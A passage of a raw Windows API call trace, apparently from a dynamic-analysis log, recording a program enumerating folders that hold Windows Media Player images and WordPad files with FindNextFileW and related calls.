ftCreationTime.dwLowDateTime=0xaf424006, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf424006, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc38, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color32.bmp", cAlternateFileName="")) returned 1 [0101.352] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf44a163, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf44a163, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x24cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color32.jpg", cAlternateFileName="")) returned 1 [0101.353] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf44a163, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf44a163, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1b38, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color48.bmp", cAlternateFileName="")) returned 1 [0101.353] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf44a163, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf44a163, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2c85, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color48.jpg", cAlternateFileName="")) returned 1 [0101.353] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4702c0, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf4702c0, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1532, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color48.png", cAlternateFileName="")) returned 1 [0101.353] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4702c0, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf4702c0, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c3140d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1532, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpnss_color48.png", cAlternateFileName="")) returned 0 [0101.353] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0101.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0101.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0101.353] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0101.353] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0101.353] CoTaskMemFree (pv=0x506980) [0101.354] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0101.354] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9874cd8b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9874cd8b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.354] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9277700, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa9277700, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa9277700, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10689, dwReserved0=0x0, dwReserved1=0x0, cFileName="Revert.wmz", cAlternateFileName="")) returned 1 [0101.354] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0101.355] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0101.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0101.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0101.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0101.355] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9874cd8b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9874cd8b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.355] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9277700, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa9277700, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa9277700, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10689, dwReserved0=0x0, dwReserved1=0x0, cFileName="Revert.wmz", cAlternateFileName="")) returned 1 [0101.355] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9277700, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa9277700, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa9277700, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10689, dwReserved0=0x0, dwReserved1=0x0, cFileName="Revert.wmz", cAlternateFileName="")) returned 0 [0101.356] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0101.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0101.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0101.356] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0101.356] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0101.356] CoTaskMemFree (pv=0x506980) [0101.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0101.357] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.357] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0101.357] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0101.357] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0101.357] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0101.357] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0101.357] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.357] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0101.357] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0101.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0101.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0101.358] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0101.358] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0101.358] CoTaskMemFree (pv=0x506980) [0101.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0101.358] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.358] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1 [0101.359] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService", cAlternateFileName="TABLET~1")) returned 1 [0101.359] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService", cAlternateFileName="TABLET~1")) returned 0 [0101.359] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0101.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0101.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0101.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0101.359] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.359] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1 [0101.360] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService", cAlternateFileName="TABLET~1")) returned 1 [0101.360] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0101.360] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0101.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0101.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0101.360] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0101.360] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0101.360] CoTaskMemFree (pv=0x506980) [0101.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0101.361] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.361] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0101.361] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e3a861e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9e3a861e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9e7acb45, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x45f000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wordpad.exe", cAlternateFileName="")) returned 1 [0101.361] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea54dff0, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xea54dff0, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x464289e0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x3a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordpadFilter.dll", cAlternateFileName="")) returned 1 [0101.361] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0101.361] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0101.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0101.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0101.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0101.362] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.362] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0101.362] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e3a861e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9e3a861e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9e7acb45, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x45f000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wordpad.exe", cAlternateFileName="")) returned 1 [0101.362] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea54dff0, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xea54dff0, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x464289e0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x3a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordpadFilter.dll", cAlternateFileName="")) returned 1 [0101.363] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea54dff0, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xea54dff0, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x464289e0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x3a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordpadFilter.dll", cAlternateFileName="")) returned 0 [0101.363] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0101.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0101.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0101.363] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0101.363] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0101.363] CoTaskMemFree (pv=0x506980) [0101.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0101.364] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.364] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe421d16, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe421d16, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wordpad.exe.mui", cAlternateFileName="")) returned 1 [0101.364] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0101.364] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0101.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0101.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0101.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0101.364] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.365] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe421d16, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe421d16, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wordpad.exe.mui", cAlternateFileName="")) returned 1 [0101.365] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe421d16, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe421d16, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wordpad.exe.mui", cAlternateFileName="")) returned 0 [0101.365] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0101.365] SetThreadErrorMode (dwNewMode=0x0, 